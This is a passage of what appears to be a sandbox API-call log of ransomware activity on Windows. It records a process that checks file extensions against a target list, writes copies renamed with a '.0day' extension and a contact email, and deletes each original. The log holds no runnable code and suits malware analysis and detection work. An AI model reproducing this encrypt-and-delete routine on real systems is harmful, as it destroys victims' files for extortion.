lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.642] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.642] lstrlenW (lpString=".dbf") returned 4 [0040.642] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.643] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.643] lstrlenW (lpString=".1cd") returned 4 [0040.643] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.643] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 99 [0040.643] lstrlenW (lpString=".jpg") returned 4 [0040.643] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.643] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0040.643] lstrlenW (lpString="SETUP.XML") returned 9 [0040.643] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0041.188] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=2424) returned 1 [0041.188] CloseHandle (hObject=0x1f4) returned 1 [0041.188] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml")) returned 0x20 [0041.188] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.188] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0041.188] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.188] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.188] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0041.189] GetLastError () returned 0x0 [0041.189] ReadFile (in: hFile=0x1f4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x978, lpOverlapped=0x0) returned 1 [0041.199] WriteFile (in: hFile=0x204, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x980, lpOverlapped=0x0) returned 1 [0041.199] ReadFile (in: hFile=0x1f4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.199] WriteFile (in: hFile=0x204, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.200] SetEndOfFile (hFile=0x204) returned 1 [0041.200] CloseHandle (hObject=0x204) returned 1 [0041.200] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.200] SetEndOfFile (hFile=0x1f4) returned 1 [0041.201] CloseHandle (hObject=0x1f4) returned 1 [0041.201] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0041.202] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\word.en-us\\setup.xml")) returned 1 [0041.202] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.202] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.202] lstrlenW (lpString=".doc") returned 4 [0041.202] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.202] lstrlenW (lpString=".docx") returned 5 [0041.202] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.202] lstrlenW (lpString=".pdf") returned 4 [0041.202] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.202] lstrlenW (lpString=".xls") returned 4 [0041.202] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.202] lstrlenW (lpString=".xlsx") returned 5 [0041.202] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.202] lstrlenW (lpString=".ppt") returned 4 [0041.202] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.202] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.202] lstrlenW (lpString=".zip") returned 4 [0041.202] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.202] lstrlenW (lpString=".rar") returned 4 [0041.202] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.202] lstrlenW (lpString=".bz2") returned 4 [0041.202] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.202] lstrlenW (lpString=".7z") returned 3 [0041.202] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.202] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.202] lstrlenW (lpString=".dbf") returned 4 [0041.202] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.202] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.203] lstrlenW (lpString=".1cd") returned 4 [0041.203] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.203] lstrlenW (lpString=".jpg") returned 4 [0041.203] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.203] lstrlenW (lpString=".doc") returned 4 [0041.203] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.203] lstrlenW (lpString=".docx") returned 5 [0041.203] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0041.203] lstrlenW (lpString=".pdf") returned 4 [0041.203] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.203] lstrlenW (lpString=".xls") returned 4 [0041.203] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.203] lstrlenW (lpString=".xlsx") returned 5 [0041.203] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0041.203] lstrlenW (lpString=".ppt") returned 4 [0041.203] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.203] lstrlenW (lpString=".zip") returned 4 [0041.203] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.203] lstrlenW (lpString=".rar") returned 4 [0041.203] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.203] lstrlenW (lpString=".bz2") returned 4 [0041.203] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.203] lstrlenW (lpString=".7z") returned 3 [0041.203] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.203] lstrlenW (lpString=".dbf") returned 4 [0041.203] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.203] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.204] lstrlenW (lpString=".1cd") returned 4 [0041.204] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.204] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Word.en-us\\SETUP.XML") returned 100 [0041.204] lstrlenW (lpString=".jpg") returned 4 [0041.204] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.204] lstrcmpiW (lpString1=".HTM", lpString2=".0day") returned 1 [0041.204] lstrlenW (lpString="MCABOUT.HTM") returned 11 [0041.204] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0041.205] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=11463) returned 1 [0041.205] CloseHandle (hObject=0x1f4) returned 1 [0041.205] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm")) returned 0x20 [0041.205] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.205] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0041.205] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.205] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.205] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0041.246] GetLastError () returned 0x0 [0041.246] ReadFile (in: hFile=0x1f4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x2cc7, lpOverlapped=0x0) returned 1 [0041.247] WriteFile (in: hFile=0x204, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x2cd0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x2cd0, lpOverlapped=0x0) returned 1 [0041.248] ReadFile (in: hFile=0x1f4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.248] WriteFile (in: hFile=0x204, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xea, lpOverlapped=0x0) returned 1 [0041.248] SetEndOfFile (hFile=0x204) returned 1 [0041.249] CloseHandle (hObject=0x204) returned 1 [0041.249] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.249] SetEndOfFile (hFile=0x1f4) returned 1 [0041.250] CloseHandle (hObject=0x1f4) returned 1 [0041.250] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0041.251] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\1033\\mcabout.htm")) returned 1 [0041.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.251] lstrlenW (lpString=".doc") returned 4 [0041.251] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0041.251] lstrlenW (lpString=".docx") returned 5 [0041.251] lstrcmpiW (lpString1=".docx", lpString2="T.HTM") returned -1 [0041.251] lstrlenW (lpString=".pdf") returned 4 [0041.251] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0041.251] lstrlenW (lpString=".xls") returned 4 [0041.251] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0041.251] lstrlenW (lpString=".xlsx") returned 5 [0041.251] lstrcmpiW (lpString1=".xlsx", lpString2="T.HTM") returned -1 [0041.251] lstrlenW (lpString=".ppt") returned 4 [0041.251] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0041.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.251] lstrlenW (lpString=".zip") returned 4 [0041.251] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0041.251] lstrlenW (lpString=".rar") returned 4 [0041.251] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0041.251] lstrlenW (lpString=".bz2") returned 4 [0041.251] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0041.251] lstrlenW (lpString=".7z") returned 3 [0041.251] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0041.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.251] lstrlenW (lpString=".dbf") returned 4 [0041.252] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0041.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.252] lstrlenW (lpString=".1cd") returned 4 [0041.252] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0041.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.252] lstrlenW (lpString=".jpg") returned 4 [0041.252] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0041.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.252] lstrlenW (lpString=".doc") returned 4 [0041.252] lstrcmpiW (lpString1=".doc", lpString2=".HTM") returned -1 [0041.252] lstrlenW (lpString=".docx") returned 5 [0041.252] lstrcmpiW (lpString1=".docx", lpString2="T.HTM") returned -1 [0041.252] lstrlenW (lpString=".pdf") returned 4 [0041.252] lstrcmpiW (lpString1=".pdf", lpString2=".HTM") returned 1 [0041.252] lstrlenW (lpString=".xls") returned 4 [0041.252] lstrcmpiW (lpString1=".xls", lpString2=".HTM") returned 1 [0041.252] lstrlenW (lpString=".xlsx") returned 5 [0041.252] lstrcmpiW (lpString1=".xlsx", lpString2="T.HTM") returned -1 [0041.252] lstrlenW (lpString=".ppt") returned 4 [0041.252] lstrcmpiW (lpString1=".ppt", lpString2=".HTM") returned 1 [0041.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.252] lstrlenW (lpString=".zip") returned 4 [0041.252] lstrcmpiW (lpString1=".zip", lpString2=".HTM") returned 1 [0041.252] lstrlenW (lpString=".rar") returned 4 [0041.252] lstrcmpiW (lpString1=".rar", lpString2=".HTM") returned 1 [0041.252] lstrlenW (lpString=".bz2") returned 4 [0041.252] lstrcmpiW (lpString1=".bz2", lpString2=".HTM") returned -1 [0041.252] lstrlenW (lpString=".7z") returned 3 [0041.252] lstrcmpiW (lpString1=".7z", lpString2="HTM") returned -1 [0041.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.252] lstrlenW (lpString=".dbf") returned 4 [0041.252] lstrcmpiW (lpString1=".dbf", lpString2=".HTM") returned -1 [0041.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.253] lstrlenW (lpString=".1cd") returned 4 [0041.253] lstrcmpiW (lpString1=".1cd", lpString2=".HTM") returned -1 [0041.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\1033\\MCABOUT.HTM") returned 73 [0041.253] lstrlenW (lpString=".jpg") returned 4 [0041.253] lstrcmpiW (lpString1=".jpg", lpString2=".HTM") returned 1 [0041.253] lstrcmpiW (lpString1=".XML", lpString2=".0day") returned 1 [0041.253] lstrlenW (lpString="DATES.XML") returned 9 [0041.253] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0041.253] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=8918) returned 1 [0041.253] CloseHandle (hObject=0x1f4) returned 1 [0041.253] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml")) returned 0x20 [0041.253] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0041.254] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0041.254] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.254] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.254] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0041.255] GetLastError () returned 0x0 [0041.255] ReadFile (in: hFile=0x1f4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x22d6, lpOverlapped=0x0) returned 1 [0041.257] WriteFile (in: hFile=0x204, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0x22e0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x22e0, lpOverlapped=0x0) returned 1 [0041.258] ReadFile (in: hFile=0x1f4, lpBuffer=0x3270020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0041.258] WriteFile (in: hFile=0x204, lpBuffer=0x3270020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3270020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0041.258] SetEndOfFile (hFile=0x204) returned 1 [0041.258] CloseHandle (hObject=0x204) returned 1 [0041.259] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0041.259] SetEndOfFile (hFile=0x1f4) returned 1 [0041.260] CloseHandle (hObject=0x1f4) returned 1 [0041.260] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0041.260] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\dates.xml")) returned 1 [0041.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.260] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.260] lstrlenW (lpString=".doc") returned 4 [0041.261] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.261] lstrlenW (lpString=".docx") returned 5 [0041.261] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1 [0041.261] lstrlenW (lpString=".pdf") returned 4 [0041.261] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.261] lstrlenW (lpString=".xls") returned 4 [0041.261] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.261] lstrlenW (lpString=".xlsx") returned 5 [0041.261] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1 [0041.261] lstrlenW (lpString=".ppt") returned 4 [0041.261] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.261] lstrlenW (lpString=".zip") returned 4 [0041.261] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.261] lstrlenW (lpString=".rar") returned 4 [0041.261] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0041.261] lstrlenW (lpString=".bz2") returned 4 [0041.261] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0041.261] lstrlenW (lpString=".7z") returned 3 [0041.261] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0041.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.261] lstrlenW (lpString=".dbf") returned 4 [0041.261] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0041.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.261] lstrlenW (lpString=".1cd") returned 4 [0041.261] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0041.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.261] lstrlenW (lpString=".jpg") returned 4 [0041.261] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0041.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.261] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.261] lstrlenW (lpString=".doc") returned 4 [0041.261] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0041.262] lstrlenW (lpString=".docx") returned 5 [0041.262] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1 [0041.262] lstrlenW (lpString=".pdf") returned 4 [0041.262] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0041.262] lstrlenW (lpString=".xls") returned 4 [0041.262] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0041.262] lstrlenW (lpString=".xlsx") returned 5 [0041.262] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1 [0041.262] lstrlenW (lpString=".ppt") returned 4 [0041.262] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0041.262] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\DATES.XML") returned 77 [0041.262] lstrlenW (lpString=".zip") returned 4 [0041.262] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0041.262] lstrlenW 